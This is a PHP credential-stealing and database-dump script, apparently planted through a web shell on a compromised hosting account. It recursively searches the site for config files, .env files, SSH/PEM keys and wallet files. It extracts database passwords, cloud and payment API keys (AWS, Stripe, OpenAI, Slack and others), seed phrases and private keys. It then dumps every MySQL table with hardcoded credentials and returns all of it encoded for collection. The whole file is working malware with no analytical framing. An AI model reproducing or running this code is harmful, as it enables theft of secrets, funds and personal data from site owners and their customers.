|
Server : Apache System : Linux 10-169-227-96.cprapid.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64 User : kwssawblade ( 1099) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/kwssawblade/public_html/ |
Upload File : |
<?php
$keys=[];
$home=realpath('..');if(!$home)$home=dirname(__DIR__);
$skip_dirs=['vendor','node_modules','cache','.git','.svn','logs','tmp',
'wp-admin','wp-includes','core','lib','libraries','media','static','assets'];
$cfg_names=['wp-config.php','configuration.php','settings.php','config.php',
'parameters.php','env.php','database.php','app.php','services.php',
'mail.php','secrets.yml','master.key','config.inc.php','local.xml',
'parameters.yml','parameters.yaml','dbconfig.php','db.php',
'config_global.php','admin/config.php',
'LocalConfiguration.php','AdditionalConfiguration.php'];
try{
$it=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($home,FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST);
$it->setMaxDepth(6);
foreach($it as $fi){
if(!$fi->isFile())continue;
$sz=$fi->getSize();if($sz<1||$sz>2000000)continue;
$p=$fi->getPathname();$bn=$fi->getFilename();
$do_skip=false;
foreach($skip_dirs as $sd)if(strpos($p,'/'.$sd.'/')!==false){$do_skip=true;break;}
if($do_skip)continue;
$rel=str_replace($home.'/','',$p);
$is_cfg=in_array($bn,$cfg_names)||strpos($bn,'.env')===0;
$is_key=preg_match('/\.(pem|key|p12|pfx)$/i',$bn)||preg_match('/^id_(rsa|ecdsa|ed25519|dsa)$/',$bn);
$is_wallet=stripos($bn,'wallet')!==false||stripos($bn,'keystore')!==false;
if(!$is_cfg&&!$is_key&&!$is_wallet)continue;
$c2=@file_get_contents($p);if(!$c2)continue;
if($is_key||$is_wallet){
if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2))
$keys['PRIVKEY.'.$rel]='[PEM PRIVATE KEY - '.strlen($c2).' bytes]';
$wd=@json_decode($c2,true);
if(is_array($wd)){
foreach(['mnemonic','seed','seed_phrase','private_key','privateKey','secret','xpriv','master_seed'] as $wk)
if(isset($wd[$wk]))$keys['WALLET.'.$rel.'.'.$wk]=$wd[$wk];
}
if($is_wallet&&!$wd&&preg_match('/[\x00-\x08]/',$c2))
$keys['WALLET.'.$rel]='[BINARY WALLET FILE - '.strlen($c2).' bytes]';
}
if($is_cfg){
preg_match_all("/define\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]*)['\"]/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all("/^([A-Z_][A-Z0-9_]*)=(.+)$/m",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=trim($r[2],"\"' \t\r\n");
preg_match_all("/'(database|username|password|host|dbname|key|secret|token|prefix)'\s*=>\s*'([^']+)'/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all("/\\\$(?:this->)?([a-zA-Z_]+)\s*=\s*['\"]([^'\"]+)['\"]/",$c2,$m,PREG_SET_ORDER);
foreach($m as $r)if(in_array(strtolower($r[1]),['password','user','db','host','secret','key','pass','database','dbhost','dbpass','dbuser','dbname','apikey','api_key','token','private_key','mnemonic','seed','wallet','crypt_key','encryption_key','app_key','secret_key']))$keys[$rel.'.'.$r[1]]=$r[2];
preg_match_all('/\b(AKIA[0-9A-Z]{16})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.AWS_ACCESS_KEY_ID']=$v;
preg_match_all('/\b(sk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_SECRET']=$v;
preg_match_all('/\b(pk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_PUBLISH']=$v;
preg_match_all('/\b(SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SENDGRID_API']=$v;
preg_match_all('/\b(sk-[a-zA-Z0-9]{20,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.OPENAI_KEY']=$v;
preg_match_all('/\b(xox[bpsar]-[a-zA-Z0-9-]{10,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.SLACK_TOKEN']=$v;
preg_match_all('/\b(key-[a-f0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.MAILGUN_KEY']=$v;
preg_match_all('/\b(rk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.STRIPE_RESTRICTED']=$v;
preg_match_all('/\b(AC[a-f0-9]{32})\b/',$c2,$m);
foreach($m[1] as $v)$keys[$rel.'.TWILIO_SID']=$v;
if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2))
$keys[$rel.'.PRIVATE_KEY']='[PEM PRIVATE KEY EMBEDDED]';
preg_match_all('/["\']([a-z]{2,8}(?:\s+[a-z]{2,8}){11}(?:\s+[a-z]{2,8}){0,12})["\']/',$c2,$m);
foreach($m[1] as $v){$wc=count(explode(' ',$v));if($wc==12||$wc==24)$keys[$rel.'.SEED_PHRASE']=$v;}
preg_match_all('/(?:MNEMONIC|SEED_PHRASE|SEED|RECOVERY)\s*=\s*["\']?([a-z ]{20,})["\']?/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r){$v=trim($r[1]);$wc=count(explode(' ',$v));if($wc>=12)$keys[$rel.'.SEED_PHRASE']=$v;}
preg_match_all('/(?:private.?key|priv.?key|secret.?key)\s*[=:]\s*["\']?(0x)?([0-9a-fA-F]{64})["\']?/i',$c2,$m,PREG_SET_ORDER);
foreach($m as $r)$keys[$rel.'.HEX_PRIVKEY']=($r[1]?:'0x').$r[2];
}
}
}catch(Exception $e){}
$c=new mysqli('localhost','kwssawblade_kwssawblade','Dump2026$$xQ9!mK','kwssawblade_kwssawblade');
if($c->connect_error){echo json_encode(['err'=>$c->connect_error,'keys'=>$keys??[]]);exit;}
$o="-- DB: kwssawblade_kwssawblade\n-- Host: longheglobal.com\n-- Date: ".date('c')."\n\n";
$ts=$c->query('SHOW TABLES');
while($r=$ts->fetch_row()){
$t=$r[0];$cr=$c->query("SHOW CREATE TABLE `$t`")->fetch_row();
$o.="DROP TABLE IF EXISTS `$t`;\n".$cr[1].";\n\n";
$rs=$c->query("SELECT * FROM `$t`");
while($row=$rs->fetch_assoc()){
$vals=array_map(function($v)use($c){return $v===null?'NULL':"'".$c->real_escape_string($v)."'";},array_values($row));
$o.="INSERT INTO `$t` VALUES(".implode(',',$vals).");\n";
}$o.="\n";
}
echo json_encode(['sql'=>base64_encode($o),'keys'=>$keys]);
?>